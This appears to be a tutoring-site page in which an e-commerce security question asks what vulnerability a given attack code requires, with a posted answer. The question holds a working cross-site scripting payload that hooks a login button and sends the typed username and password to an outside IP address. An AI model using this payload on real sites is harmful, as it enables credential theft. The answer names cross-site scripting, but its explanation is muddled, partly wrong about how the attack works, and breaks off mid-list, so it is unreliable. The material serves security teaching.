What vulnerability does the below attack code require? Explain how it works? \';

Question

What vulnerability does the below attack code require? Explain how it works? ';--"></input><script>

functiondoBad() {
vari = new Image().src = "http://192.168.177.1/p=" + document.getElementById("txtPassword").value + "&u=" + document.getElementById("txtUsername").value; document.getElementById("frmLogin").submit();
}
function hook() {
document.getElementById("btnSubmit").onclick = function() { doBad(); }; alert('hook called'); }
setTimeout( function() { hook(); }, 1000 );
</script><input type="hidden

subjact

Ecommerce Security

Remember to cite any resources you use

Explanation / Answer

Answer :

In the above given code the line var i = new Image().src = "http://192.168.177.1/p=" may be attacked by the attacker in a way called cross site scripting code,it can be explained as the success of this attack requires victim or user to execute a malicious or dangerous URL which is given as http://192.168.177.1 in our code to upload a image using src attribute which may be shaped in such a manner to appear to be legal URL at first look. When visiting such a shaped URL(http://192.168.177.1) an attacker can effectively execute something malicious or poisonous into the user's browser. Some dangerous javascript code .for example, will be run in the context of the web site which possesses the bug or infected code or virus.cross site scripting is generally made possible where the user's input is shown. The following are the most used targets:

Related Questions

Navigate

• Browse (All)
• Browse W
• Subjects

Integrity-first tutoring: explanations and feedback only — we do not complete graded work. Learn more.